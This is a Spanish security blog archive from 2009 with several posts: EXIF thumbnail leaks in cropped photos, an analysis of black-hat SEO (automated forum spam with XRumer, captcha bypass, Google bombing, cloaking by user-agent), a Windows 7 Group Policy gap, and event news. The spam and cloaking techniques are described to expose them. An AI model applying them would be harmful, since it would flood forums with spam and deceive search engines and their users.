La información EXIF asociada a fotografías ha dado y da muchas tardes de diversión para los amigos de los metadatos. Es por eso que se decidió dar especial importancia a EXIF en la FOCA. Ahora mismo la versión de la FOCA extrae la información EXIF asociada a archivos gráficos y la información EXIF asociada a archivos gráficos incrustados en documentos ofimáticos.

Muchas son las cagadas que se pueden sacar de la información EXIF como pedir que te envíen una foto reciente y la fecha de la misma sea de hace 3 años, publicar una foto de porno amateur generada con tu ay!fon en la que ocultas tus ojos pero dejas guardada la información GPS de tu casa y, por supuesto, la famosa cagada del thumbnail.

La cagada del thumbnail o miniatura se produce cuando envías tu foto a un grupo de porno amateur. Esa fotografía la has recortado desde una fotografía original que, en la información EXIF, llevaba asociada la miniatura. Si el programa que has utilizado no modifica el thumbnail cuando recortas la foto, entonces estás jodido y las risas pueden ser grandes.

Normalmente esto sucedía con los usuarios que utilizan para esta ardua labor de retoque fotográfico la suite de diseño gráfico llamada “Paint Brush”. En sus versiones de Windows XP y Windows Vista no modifica el thumbnail. Veamos un ejemplo.

En esta fotografía estoy yo con David Cervigón jugando un día al PaintBall. En ella se puede ver que yo estoy feliz, antes de darme cuenta de que con David no hay que jugar con cosas que puedan generar moratones y hacer daño.

Figura 1: Foto Original
Supongamos que decido, una vez que me ha dado para el pelo, quitarle de mi fotografía y utilizo para ello el Paint Brush de Windows Vista.

Figura 2: Foto modificada con el Paint de Windows Vista
Para poder comparar resultados realizo la misma acción con el Paint Brush de Windows 7.

Figura 3: Foto modificada cone l Paint de Windows 7
Aparentemente, cuando se visualizan las fotos, ambas son iguales pues externamente han sido cortadas las dos. Sin embargo, si miramos la información EXIF asociada a estas dos fotos con la FOCA RC2, podemos ver que la que se ha editado con Windows Vista aun conserva el thumbnail original. Esto es así porque el Paint de Windows Vista no modifica la info EXIF.

Figura 4: Información EXIF asociada a foto modificada con Paint de Vista
Sin embargo, la información EXIF de la fotografía modificada con el Paint Brush de Windows 7 si ha sido modificada, y en el thumbnail se almacena la información de la miniatura después de ser modificada.

Figura 5: Información EXIF asociada a foto modificada con Paint de Windows7
Como conclusión, si queréis seguir con vuestras aventuras de fucker enmascarado, es mejor que utilicéis Windows7 o que probéis como se comporta vuestra herramienta de de "retoque fotográfico" favorita con la información EXIF.

Saludos!

PD: ¿Qué otras herramientas conoces que se comporten como el Paint de Windows XP y Windows Vista con los thumbnails?

Y la próxima semana...

noreply@blogger.com (Maligno) — Sat, 31 Oct 2009 23:01:00 +0000

Los seminarios de la Azlan D-Link Academy tendrán lugar en Barcelona, con 4 acciones formativas que darán acceso a los certificados oficiales D-Link de Security, Networking y WiFi. En Madrid continuará la campaña de Hands On Lab con seminarios dedicados a System Center y Windows Server 2008 R2. El Innovation Tour, gira de presentación de Windows 7 y Windows Server 2008 R2 nacional, llegará a Santiago de Compostela y a Logroño, mientras que el Developer & Design Tour estará el día 4 en Santiago de Compostela. A parte de todo esto, el día 5, yo pasaré a dar una charla por la Universidad de Burgos a las 19:00 horas. Esta es la agenda detallada:

02 [Barcelona] DL01 – Network Design
02 [Madrid] HOL-MOM10 MS System Center Operations Manager 2007
03 [Santiago] Innovation Tour
03 [Barcelona] DL04 – Tecnología WiFi
03 [Madrid] HOL-WIN51 Implementación MS Windows Server 2008R2
03 [Madrid] HOL-WIN70 Implementando Redes WiFi Seguras
04 [Santiago] Developer & Design Tour
04 [Barcelona] DL03 – Tecnología Firewalling
04 [Madrid] HOL-MOM11 MS SC Operations Manager 2007 con Exchange Server
05 [Logroño] Innovation Tour
05 [Barcelona] DL02 – Tecnología Switching
05 [Madrid] HOL-WIN52 MS Windows Server 2008R2 Server Core
05 [Burgos] Metadata Security
06 [Madrid] HOL-SMS10 System Center Configuration Manager 2007

Y aquí, en el blog, yo seguiré con mis chorradas.

Saludos Malignos!

Técnicas SEO para gente de moral relajada [II de VI]

noreply@blogger.com (Maligno) — Fri, 30 Oct 2009 23:01:00 +0000

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Spam de temas de debate

Como el objetivo es conseguir el mayor número de links entrantes a la web que se busca posicionar bien en un buscador, el poner links en cualquier lugar es obligatorio. Para ello se busca postear en cualquier sistema que lo permita y poner links allí. Objetivo típico de esta técnica son los foros de debate y blogs entre otros.

Para ello, el atacante primeramente se ha de crear una lista de URLs de foros y blogs descubiertos que permitan postear comentarios y que además sean "consentidores", es decir, que no borren el spam o que al menos no lo borren rápido. Estas listas de URLs masivas se cargan en programas que automatizan la creación de entradas, en el caso de que se pueda realizar, o simplemente postear comentarios. En la siguiente imagen se puede ver como se ha creado un nuevo tema de debate en el foro de GIMP-ES.

Figura 4: Tema de debate sobre la Viagra en Gimp-es
Esto no tendría tanta importancia si el resultado fuera de un único tema, pero como se puede ver realizando una simple búsqueda en Google, el número de temas recomendando Viagra que se ha creado en este foro es de más de 2.700.

Figura 5: Más de 2.700 resultados de Viagra en Gimp-es
Spam de comentarios

A veces no se consiguen crear temas de debate, pero se pueden postear libremente comentarios en algún tema de debate ya existente, por lo que se abusa para introducir links a la página que se desea posicionar mejor.

En este ejemplo concreto, en un foro del Ministerio de Educación y Ciencia se llegaron a postear infinidad de comentarios que hiceron que del mismo tema se alcanzará el friolero número de más de 200 páginas.

Figura 6: Más de 200 páginas en un tema de debate sobre "La sombra del viento". El libro es bueno, pero...
Afortunadamente, hoy por hoy este tema en el foro está cerrado y se ha limpiado de todo lo que llegó a aparecer por allí. Por el contrario, los spammers han seguido acribillando otros temas de debate dentro del mismo foro, llegando hasta más de 350 páginas.

En otras ocasiones se abusa en las opciones de configuración relajadas de los comentarios en los blogs. El lado del mal ha sido atacado varias veces con comentarios del tipo que puedes ver aquí.

Figura 7: Comentario de spam en "Un informático en el lado del mal"
El error grande fue no eliminar ese primer comentario metido de spam, con lo que el blog fue atacado dos veces con más de 200 comentarios del estilo de este, aprovechándose de la configuración relajada de comentarios de este blog, que permite usuarios anónimos y de que el comentario inicial no había sido borrado.

Automatización de spam

Para realizar este posteo de temas y comentarios de forma automática existen muchas herramientas. Quizá una de las más populares para realizar este ataque sea XRumer de Alexandr M. Ryabchenko. Esta herramienta está diseñada y pensada expresamente para esta tarea.

Figura 8: XRumer 5
Soporta ataques automatizados a phpBB, YaBB, vBulletin, Invision Power Board, etc… La herramienta permite crear cuentas de forma automatizada si es posible, postear nuevos temas de debate, responder a temas existentes, o incluso crear sus propios debates, contestándose a sí mismo. Todo esto, con soporte multithread, por supuesto, y generación de mensajes automáticos, uso de proxy y comprobación del anónimato del mismo más un testeo posterior para saber que ha tenido éxito en cada intento.

Existe un tutorial de la versión 3, no de la última versión, y la herramienta, en versión 5, está disponible a la venta en la URL http://www.botmasternet.com, pero permitidme que no le enlace desde este post.

Captchas

Como es de suponer, la única defensa posible, aparte de una política férrea de permisos sobre los usuarios que pueden postear o no, es la protección por captchas. No obstante, el uso de captchas débiles tampoco es solución contra este tipo de herramientas pues estas herramientas también vienen preparadas contra este tipo de protecciones. La siguiente imagen muestra la lista de captchas que es capaz de saltarse esta herramienta.

Figura 9: Captchas soportados por XRumer
No es de extrañar que se armara tanto revuelo cuando Rubén Santamarta publico una forma para saltarse el captcha de Google utilizando el sistema de accesibilidad auditiva, ya que esto podría suponer un incremento masivo del volumen de spam a través de los sistemas de Google.

AntiSpam

Como medida adicional a los captchas, muchos sistemas de publicación que permiten comentarios de usuario están aplicando tecnologías AntiSpam como política de aprobación o no de un comentario. Estas políticas son similares a las utilizadas en el correo electrónico. Su objetivo es analizar la topología del comentario y descubrir si es un mensaje de spam o no mediante un índice similar al SCL (Spam Confidence Level).

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Medidas Anti-crisis en LA

noreply@blogger.com (Maligno) — Fri, 30 Oct 2009 09:12:00 +0000

Supongo que a esta hora del día ya todos os habréis enterado de que el ayuntamiento de L.A. (siempre quise ir allí, dejar un día esta ciudad) ha decidido contratar Gmail como correo para los 30.000 empleados de la ciudad.
¿Cómo? ¿Estamos locos? ¿Es good enough?

Sé que Gmail tiene muchos fans, y que para gran parte de ellos es el culmen de la evolución de la ciencia [Gracias Einstein, gracias Galileo, pero ya hemos llegado al final del camino… ah, no, que viene Wave] pero la realidad es que no tiene nada que ver con un sistema de comunicaciones corporativo como es Exchange "Conan" Server.

Lo cierto es que no pretende ser este post ningún artículo de competencia entre Gmail y Exchange "Poli de Guardería" Server, ya que en primer lugar sería una pelea baladí y torticera pues Gmail habría que comprarlo con Live y no con algo infinitamente superior como Exchange “Terminator” Server 2003, 2007 o 2010 (cualquiera de ellos).

Lo que más me ha llamado la atención de esta noticia ha sido el dónde y el cuándo.

Dónde:

En Los Ángeles, capital central de los negocios de California, estado dónde Google paga la mayor parte de los impuestos de beneficios que obtiene a nivel mundial. Luego hay algo claro, lo que es bueno para Google es bueno para California. Este concepto que tal vez suene extraño se puede ver en nuestro país con las ubicaciones de las fábricas de coches. Si una región tiene una fábrica de Citröen, entonces la mayoría de los coches que se venden allí son Citröen y todos te recomiendan Citröen. Lo mismo con la marca que elijáis.

Cuando:

Pues en plena crisis económica, cuando más se necesita recaudar por parte de las administraciones públicas y haciendo un anuncio justo el día del aniversario de Internet. Joder, estos tipos son unos reyes del marketing. Si mucha gente decide seguir el ejemplo de LA (simpre quise ir allí, ¿lo he dicho?) con lo que recaude de impuestos a Google puede hacer que le salga gratis y encima gane pasta California. Eso es un plan ROI bien montado.

La verdad es que me ha parecido un movimiento estratégico muy bien jugado por los políticos de California y por la propia Google digno de que le den un premio de marketing, porque seguro que muchos siguen el ejemplo de irse a Google porque ya lo hizo “el ayuntamiento de L.A”.

Por último, es importante recordar, que para conseguir este acuerdo Google ha tenido que cambiar, de forma especial para ellos, las políticas de seguridad y privacidad, pues, como ya se sabe desde hace mucho tiempo, no son las más adecuadas para aplicar alguna legislación como la LOPD o la LSSI de nuestro país. Y a los usuarios, habrá que enseñarle que correos que no entran en Exchange ni en broma, se los van a comer en Gmail.

Mandadle una invitación de Wave a Conan, que ya tiene el Gtalk
Saludos Malignos!

UPDATED: No me podía resistir a poner la canción, que yo también fui joven

Telemetría

noreply@blogger.com (Maligno) — Wed, 28 Oct 2009 23:01:00 +0000

Con los años no me han quedado más narices que aprender algo sobre la organización y gestión de eventos. Esto le pasaría a cualquiera que llevara más de 8 años participando en eventos y habiendo pasado por más de 500 conferencias/charlas/cursos/seminarios/reuniones de bar.

A lo largo de los años he interiorizado detalles de comportamiento en ponentes y pautas a evitar, aprender o repetir. Formulas que generan estrés en un asistente, aburrimiento, desasosiego o alegría. Muchas de ellas no sé explicarlas, otras sí, y se las transmito a los compañero cuando creo que pueden aportarles algo, que lo van a agradecer o que es necesario para que mejoren la experiencia de la ponencia por parte de los usuarios.

“Si hablas muy rápido generas estrés, si dices veinte veces que no te da tiempo la gente piensa que realmente está mal diseñado y si una demo te falla y pides perdón 100 veces entonces los asistentes piensan que esa demo era LA DEMO y ellos, pobres, no han podido verla”.

Conversaciones como estas se tienen después o antes de una charla entre los distintos ponentes. Yo me fijo en los trucos de los demás para ganar atención, mejorar la claridad del mensaje o conseguir una mejor comprensión por parte de los asistentes.

Sin embargo, nada de eso valdría sin la telemetría. Si yo creo que algo no ha gustado no es realmente que no ha gustado hasta que no se comprueba. Y viceversa. Hay mucha gente que sale tan contenta de su charla y luego la telemetría dice otra cosa.

¿La telemetría?

Sí, la telemetría. Gonzalo Alvarez Marañón dice que si algo no puedes medirlo no puedes mejorarlo. Es necesario contar con un equipo de telemetría. Y ese truco me lo sé yo desde hace mucho tiempo, que ya sabéis que más sabe el maligno por viejo que por maligno.

Desde hace mucho tiempo descubrí, gracias al gigante del mal, a la corporación Spectra, que todo es mejorable. ¡Dios!, ¡que revelación cuando oí eso la primera vez! Os lo voy a repetir: “Todo es mejorable”.

La primera vez que lo escuché, justo tras una campaña, me sorprendió, porque yo pensé que se refería a que se iba a obtener un resultado malo en los cuestionarios de calidad y no era así. Los cuestionarios de calidad reflejaban unas calificaciones impresionantes.

La respuesta que me dio me enseñó que, efectivamente, ellos esperaban los mejores cuestionarios, porque no esperan que un asistente ponga un 3 en un cuestionario porque no le han dado 1.000.000 de dólares como regalo, o que uno ponga un 7 porque el regalo no le gustaba. La realidad es que se espera de un asistente que valore, con sinceridad, lo que se le ha ofrecido y no sueños o deseos. Lo que sí que es cierto, es que todo, siempre, puede hacerse un poco mejor y que, muchas veces, sin necesidad de gastar más dinero. Los comentarios que los asistentes ofrecen libremente con ideas, sugerencias o detección de defectos, ayudan a mejorar.

Ese día aprendí a amar los cuestionarios y a que había que generar siempre telemetría.

Desde hace tiempo, todos los eventos en los que me veo involucrados contrato a una empresa la telemetría de eventos. Una telemetría que utilizo para mejorar una charla, para cambiar un ejemplo, modificar la forma en la que cuento una historio o quitar algo que he dicho.

Tras años de ver charlas, y sus telemetrías, soy capaz de, mirando al público y viendo la ponencia, acercarme a los resultados de valoración que va a obtener en los cuestionarios. Esto me llevó a decir, en un post reciente, que las charlas de Ángel y Dab en las II jornadas de Seguridad de la Universidad de A Coruña habían sido mejores que la mía. En la telemetría quedé el tercero.

Figura 1: Telemetría II Jornadas Universidad A Coruña
Desde hace tiempo tengo un pique con Carles Martin por las valoraciones de las charlas. Y es que el tipo habla de cojones, el muy capullo. Así, en los resultados finales de la telemetría siempre andamos como en la fórmula 1, en las décimas o centésimas.

Figura 2: Resultados Gira Summer Of Security 2009 - Chema Alonso

Figura 3: Resultados Gira Summer of Security 2009 - Carles
(Vale, es cierto, he aprovechado y he puesto unos resultados donde yo gané a Carles, pero él me dio para al pelo en el AD Movies, así que... ¡que lo ponga él en otro sitio que este es mi blog! :P)

Sumar la telemetría de las charlas, los materiales, la sala, la organización, etc… da una buena imagen de si realmente los asistentes han disfrutado o no el evento. Para mi es fundamental.

No sé para vosotros, pero estos piques sanos con los ponentes me encantan aunque salga perdiendo en algunas batallas, como en el SIMO, donde mis compis de I64 me dieron para el pelo en los Hands On Lab del SIMO.

Figura 4: Telemetría HOLS Guiados SIMO 2009
Saludos Malignos!

Técnicas SEO para gente de moral relajada [I de VI]

noreply@blogger.com (Maligno) — Tue, 27 Oct 2009 23:01:00 +0000

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Justificación

Hay algo en lo que los distintos estudios sobre el uso de buscadores de Internet coinciden: casi todos los usuarios hacen clic en algunos de los enlaces de la primera página de resultados. Muchos lo hacen en los de la segunda. Hay quien, incluso, visita algunas de las direcciones listadas en la tercera, pero casi nadie pasa de ahí. Aparecer en la quinta página de resultados es casi lo mismo que no aparecer. Y, para una empresa u organización, eso puede significar no tener relevancia en el sector, no hacer negocio, carecer de publicidad… En definitiva, no existir.

No es de extrañar que existan empresas que se dedican al posicionamiento en buscadores, es decir, a conseguir subir la relevancia de una página dada dentro de los resultados asociados a una determinada búsqueda. Pero no todas ellas realizan su trabajo de forma honesta: existe una nueva clase de empresarios de “moral relajada” que utilizan sus propias técnicas, no siempre legales, para obtener sus beneficios.

El presente artículo no es un artículo sobre SEO, sino de algunas técnicas y trucos, menos legales que más, que algunos usan para conseguir aparecer en las primeras posiciones de los resultados a una determinada búsqueda sin pagar el coste de los enlaces patrocinados.

Breve resumen de la historia del SEO para dummies

Inicialmente, la relevancia de una página respecto a una cadena de búsqueda, se debía, única y exclusivamente, al contenido de la página. Para ello, los procesos de indexación y análisis de contenidos de una página realizaban un thesaurus de la misma. Es decir, leían todas las palabras, se quitaban todas las palabras ruido como artículos, preposiciones, conjunciones, etc…, después de contaban las repeticiones de la misma palabra, se medía su importancia respecto del tamaño total de la página, se miraban sinónimos de la misma palabra e incluso se buscaban las palabras especiales, es decir, las que eran menos comunes para darles mayor importancia. Otro de los aspectos que se evalúa dentro de una página web es, lógicamente, la ubicación del término dentro de la misma. No es igual que la palabra esté en el título que en una etiqueta meta, dentro del comentario de un visitante, en el texto de un botón o en que forme parte de un párrafo de texto. La ubicación cuenta.

Spamdexing

Pero hacia la segunda mitad de los 90 este esquema dejó de ser válido. Hasta ese momento muchas webs eran diseñadas específicamente para atraer la atención de los buscadores, normalmente incluyendo numerosos tags META, con palabras en muchos casos no tenían relación con los contenidos de las páginas. A esta práctica se le conoció como “spamdexing”.

La respuesta de los buscadores fue basar el orden de sus resultados en criterios más objetivos que los contenidos de la página. Y en el nuevo modelo los enlaces jugaron un papel fundamental.

Así, el número de enlaces entrantes y salientes definen la importancia de una página, su “peso” en Internet. Supongamos que una página tiene 20 links que apuntan a ella y ella apunta a 3. Cada uno de las 20 páginas que le apuntan tendrá su propia relevancia y, en función de ésta, le aportarán parte de su importancia en cada enlace. Del mismo modo, cada uno de los tres enlaces presentes en esta página proporcionará relevancia a las páginas destino.

Dicha relevancia se utiliza para modificar el valor de una palabra en una búsqueda. Así, cuando se hace una búsqueda de un término, se mira, tanto el contenido de la web, como el contenido de los links que apuntan a esa página y la relevancia de las páginas web de las que proceden los links.

La relevancia se mide por página y no por dominio como muchos hemos creido alguna vez, así que la importancia de la ubicación de un link dentro de un dominio también importa. No es lo mismo la página principal de un sitio que puede tener un valor alto, como un link puesto en una página interior que tenga una valor bajo. Los valores de una página se pueden consultar en muchos lugares. Hay un buscador en SEOchat.

Bombas Google

Conociendo este comportamiento era posible conseguir que en los primeros resultados de un término apareciera una página en la que no se encuentra, por ningún sitio, el término buscado. Un ejemplo clásico de esto es el de la palabra “ladrones” que fue usado masivamente para enlazar la web de la SGAE.

A conseguir este objetivo, es decir, asociar una palabra que no tenía nada que ver con el destino de forma "fraudulenta" se conoce como Google Bombing. Esto se utilizó con muchos políticos en España para asociarles términos como indeseable, asesino, etc...

Google decidió cambiar la forma en que funcionaba el algoritmo de relevancia para detectar estas bombas en el año 2007 aunque la importancia de los términos siguió siendo importante, y, por supuesto la relevancia de la web se sigue midiendo en enlaces de entrada. Para detectar bombas lo que intenta el algoritmo de Google es averiguar cuando el término y la página destino realmente no tienen nada que ver. Pero hecha la ley hecha la trampa. ¿Qué tal apuntar a un link de la SGAE con la palabra ladrones a pesar de que éste no sea un valor correcto?

Figura 1: De 3.350.000 páginas con información sobre el término ladrones, la SGAE es la primera.
Algunas grandes empresas han utilizado sistemas tramposos similares para conseguir subir la relevancia de campañas de promoción. Un ejemplo de esto el caso de BMW Alemania. Esta web comprobaba el valor del campo user-agent del cliente que realizaba la petición y, si era el robot de Google, le entregaba una página totalmente distinta a la que podía ver un usuario. Esto le permitía a la página ofrecer una página mucho más enfocada a la indexación y que realmente correspondía con todos los links que había comprado, pero sin embargo, la página de verdad que vería un usuario no era tan relevante como la que veía el indexador. Google detectó este comportamiento y eliminó esta página de la base de datos del buscador hasta que no cambiara su comportamiento.

Figura 2: Página que veía el agente de google

Figura 3: Página que veían los navegantes
Este truco de utilizar páginas distintas para el navegador y para el usuario había sido muy utilizado por los pobres diseñadores Flash, que tanto les costaba que el contenido de sus swf generara relevancia en las búsquedas.

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Ataque de David Hasselhoff mejorado

noreply@blogger.com (Maligno) — Mon, 26 Oct 2009 23:01:00 +0000

En i64, desde que "cierto sevillano pelirojo pisó el SOCtano", se instauró la moda del ataque de David Hasselfoff. La idea es tan sencilla como recordar a los compañeros que no debe dejarse el equipo con la sesión abierta cuando se abandona el puesto de trabajo.

Algunos lo aprendemos antes que otros. Son estos últimos los que acaban blasfeamando, cabreándose consigo mismo o buscando nuevas vendettas. Y es de uno de estos últimos de lo que va esta historia y descubrimiento.

El susodicho ser víctima, llamémosle "señor M", decidió que no le volvería a pasar nunca más el escarnio del ataque, así que, para dar por culo al resto de compañeros estableció una política local en Windows 7 en la que dejaba configurada la imagen de fondo de escritorio que le gustaba además de otra política para que no se pudieran hacer cambios en él.

Como reconstrucción de los hechos yo he establecido una foto del sistema de aviso de tiempos utilizado en la ekoparty como fondo de pantalla. Como se puede ver en la siguiente secuencia.

Figura 1: Estabalecimiento de políticas

Figura 2: Fondo de pantalla establecido
Este valor de fondo de escritorio no puede ser cambiado entrando en la configuración de la pantalla, ya que la política lo prohibe. Tampoco se puede cambiar si se utiliza la opción que se ofrece al pulsar sobre la imagen guardada de nuestro querido sex symbol, tal y como se ve en la figura 3.

Figura 3: Intento fallido de cambiar el fondo de escritorio desde el explorador de archivos
Todo parecía bien seguro para el "señor M" y se relajó. Abandonó su puesto de trabajo temporalmente y se olvidó, una vez más, de cerrar su sesión. El "señor Z", al acecho, y pendenciero, desde su puesto de mando privilegiado, vio a la gacela herida sobre la mesa y no se lo pensó dos veces. Salto sobre ella, navegó por Internet buscando la tan amada instantanea de nuestro David y, desde el propio navegador, utilizo la misma opción: Establecer como fondo de escritorio.

Figura 4: Opción de establecer como fondo de escritorio desde el navegador
Cuál sería la sorpresa del señor...M, cuando al llegar a su ordenador el fondo de escritorio lucía como se puede apreciar en la siguiente imagen:

Figura 5: PWNED
Vaya por delante que la política está bien configurada y que la configuración de UAC está al máximo nivel de protección, es decir, que avisa siempre que se utilizan los privilegios de administración en el sistema.

¿Qué ha pasado entonces?

Pues que esa política a niel de usuario es una desactivación de funciones y parece que a alguien se le ha olvidado desactivar esta función en concreto con esta política. La realidad es que hay ciertas políticas en los sitemas Windows que se parecen mucho por herencia con el pasado. El problema de una política antigua es que tal vez no funciona correctamente en una versión más moderna y es por ello por lo que se crea una nueva versión de la política que matiza o fortifica la antigüa.

En este problema del escritorio la solución es tan fácil como aplicar la política correcta, es decir, la de impedir cambios del fondo de escritorio en la política del panel de control.

Figura 6: Directiva de bloqueo de panel
El resultado es que, tras el forzado de la recarga de la política, la opción queda deshabilitada de todas partes, incluido el menú contextual de imágenes vistas a través del navegador.

Figura 7: Desactivado
Conclusión: Antes de aplicar una política asegúrate de que hace lo que esperas que haga y, por encima de todo, no dejes la sesión abierta de tu ordenador.

Saludos Malignos!

Cosas para esta semana

noreply@blogger.com (Maligno) — Mon, 26 Oct 2009 13:30:00 +0000

Para los aburridos, os dejo aquí la lista de seminarios que van a tener lugar esta semana. Como se puede ver hay muchas cosas en Bilbao, con la llegada del Innovation Tour, el Design Tour y los Hands On lab con su última semana. Aparte de Bilbao, yo iré con el Innovation Tour a Valladolid y los compis seguirán luchando para cerrar esta quinta temporada de Hands On Lab en Madrid con una semana dedicada sólo a productos de seguridad.

El viernes, yo daré una clase en el FTSAI V para los que estéis apuntados y Carles Martín de Quest Software, aprovechará para dar un seminario a través de Internet, sobre Exchange Server 2010.

Por último, si estás en paro o en situación de mejora de empleo, pudes hacer aun pruebas para los nuevos cursos de Antihacking que tendrán lugar en Getafe del 16 de Noviembre al 15 de Diciembre. A razón de 5 horas cada día en horario de mañana o de tarde. Para hacer dicha prueba tendrás que pasar el miercoles que viene a las 10:00 de la mañana o a las 17:00 de la tarde por el “Centro de Formación en Tecnologías de la Información y las Comunicaciones - Madrid Sur” del Servicio Regional de Empleo de la Comunidad de Madrid que está sito en la Avenida Arcas del Agua s/n, CP: 28905, Getafe (Madrid), metro Conservatorio. El curso lo vamos a impartir desde Informática64.

Agenda

27 [Madrid] HOL-FOR05 MS Forefront TMG: Instalación y Configuración
27 [Bilbao] HOL-SQL29 MS SQL Server 2008. Gestión de Base de Datos
27 [Bilbao] Innovation Tour
27 [Bilbao] HOL-SPS04 MS Windows Sharepoint Services V3

28 [Madrid] HOL-FOR06 MS Forefront TMG: Protección de Amenazas
28 [Madrid[ HOL-ISA24 MS Intelligent Application Gateway 2007
28 [Bilbao] Desing Tour
28 [Bilbao] HOL-SPS09 MOSS 2007. Arquitectura de Portales
28 [Biblao] HOL-SQL30 MS SQL Server 2008. Entorno de Desarrollo
28 [Getafe] Prueba de Curso Antihacking

29 [Madrid] HOL-FOR07 MS ForeFront TMG: VPN y Branch Office
29 [Bilbao] HOL-SPS08 MOSS 2007. Gestión empresarial
29 [Valladolid] Innovation Tour

30 [Madrid] HOL-FOR08 MS Forefront Stirling
30 [Bilbao] HOL-SPS10 MOSS 2007. Entornos Colaborativos
30 [Webcast] MS Exchange Server 2010

Saludos Malignos!

Las crónicas de la campinglance

noreply@blogger.com (Maligno) — Mon, 26 Oct 2009 07:25:00 +0000

El fin de semana del Asegúr@IT Camp ha transcurrido según estaba previsto lo cual es algo a tener muy en cuenta cuando se junta un montón de gente de un montón de sitios durante un fin de semana fuera de su ambiente habitual y los pones a estudiar.

En el Asegúr@IT Camp hemos asistido 52 personas, exactamente el número de plazas que se habían reservado para las cabañas, con lo que me arrepiento de no haber jugado alguna lotería de esas de acertar números. Entre el grupo de asistentes, de nuevo, gente de todas partes, desde Sevilla, A Coruña, León, Bilbao, Valladolid, Vitoria, Barcelona, Burgos, Frankfurt, Madrid, etc… ha venido algún destacamento. Un montón de gente que se ha venido a pasar un fin de semana al monte y que el monte ha decidido agradecérselo con un tiempo increíblemente bueno.

Las cabañas que nos esperaban allí estaban geniales, con dos habitaciones con dos camas cada una con sus mantas, sábanas y toallas, cocina con neverita, platos, vasos y demás neceseres, salón con su tele de 14 pulgaditas, cuarto de baño, etc… vamos, que nos hemos ido de Camping, pero como se van los que ya tenemos una edad.

El viernes fuimos llegando de diferentes lugares y a diferentes horas el grueso del pelotón. Las chicas de Eventos Creativos nos fueron cuidando y dirigiendo a nuestros niditos para que dejáramos las cosas y pudiéramos ir a juntarnos todos y tomar cervezas en la cafetería hasta la hora de la cena, que fue a las 22:00. La cena, sorprendentemente, estuvo buena y ya pudimos envinarnos un rato para empalmar con la sesión de chistes trianeros en la caballa de I64 donde comenzó la debacle de algunos que decidieron tomar botellón con Whiski marca SG y Cola marca Autentica.

La noche fue más dura para algunos que para otros, pero al día siguiente estaban todos, bueno, todos no, un irreductible miembro de un pueblo trianero y un catalán que decía cosas como “eres un fuquin crá”, fueron los únicos que no estuvieron en el desayuno y a primera hora en las charlas. El resto, estuvimos ahí como clavos.

La jornada comenzó con Carles Martín de Quest Software y su charla de interconectar equipos Mac OS y Linux al directorio activo. Para la charla Carles me trajo un bonito disfraz de Yoda que, siendo uno tan fan como es de Star Wars, no pude evitar ponerme. Carles regaló un i-Pod nano y una camiseta y la charla estuvo en su línea: perfecta.

Alberto Moreno “Gospel”, dio la charla después, con sus ene portátiles, móviles, microportátiles, etc.. para enseñarnos algunos ataques chulos de MIT (Mobile in The Middle) o como capturar las claves de asociación de dispositivos mediante Bluetooth, crackearla y suplantar a un dispositivo autorizado, como realizar un ataque de path transversal al servicio OBEX Ftp, etc… la charla fue muy buena, a pesar de que al principio una demo le dio guerra. Llevo tiempo viendo la charla de seguridad en móvil de Gospel, pero cada vez que la repite es más chula. Me alegra llevar el BT desconectado de mi móvil.

Conseguimos después que viniera el irreductible trianero a dar la charla de análisis de tramas de red. Juan Garrido “silverhack” nos hizo alguna demostración de analizar el protocolo del Messenger para reconstruir conversaciones, ficheros transmitidos e incluso video, en este caso con las herramientas de Ramiro Polla. Muy buena charla del contador de chistes más rápido del camping.

David Cervigón vino para terminar la mañana a hablar de virtualización y enseñarnos como va todo esto, desde la creación del almacenamiento donde se guardan las máquinas virtuales, hasta el nuevo Office en la nube. La charla fue de abajo, el hierro, hasta arriba, las blanditas nubes y la gente se lo pasó, al menos tan bien como el Cervi cuando lo cuenta, porque se le ve disfrutar con esas cosas.

Comida de espaguetis a la boloñesa y pollo asado para retomar fuerzas y vuelta al lio con la FOCA RC2 y las nuevas opciones de la misma impartida por Alejandro Martín Bailón y el mismísimo señor Francisco Oca que se subió a hacer las demos. Una charla rapidita de la que salió algún nuevo fan de la FOCA que no la había probado nunca.

De nuevo otra charla rapidita, esta vez de David Carrasco, nuestro amigo de Héroes Certificados, sobre DNSSec, con su gracia habitual. David conto las bonanzas y las carencias de usar DNSSec y cómo montarlo para configurar un servidor DNS que firmara las respuestas ofrecidas a las consultas.

De esa charlita pasamos a Alejandro Ramos, que impartió una las charlas que a mí más me gustan. Las de cotilleos. Yo soy una portera y Dab se conoce muchas de las historias que han pasado en la comunidad hacker. Le encanta conocer el qué y el cómo de las cosas que han pasado, así que nos empezó a sorprender con las aventuras de defaces a sitios famosos, vendettas, fails épicos, etc…

Y para cambiar el tercio, Nico, que apareció a la hora del vermú nos contó un poco la historia de Nicodemo animation para subsistir en este mundo de animación por ordenador en Flash y el mundo de la publicidad. Sus inicios con los linking days de el corte inglés de donde salieron los nombres de los niños mutantes de San Ildefonso, su Doctor Birufilla y los Sabías lo Qué de El País, El episodio continuación del famoso “Historia de Amor” de Cálico electrónico que viene como extra en el DVD de la tercera temporada, etc..

Cálico Electrónico: Hasta los Clones
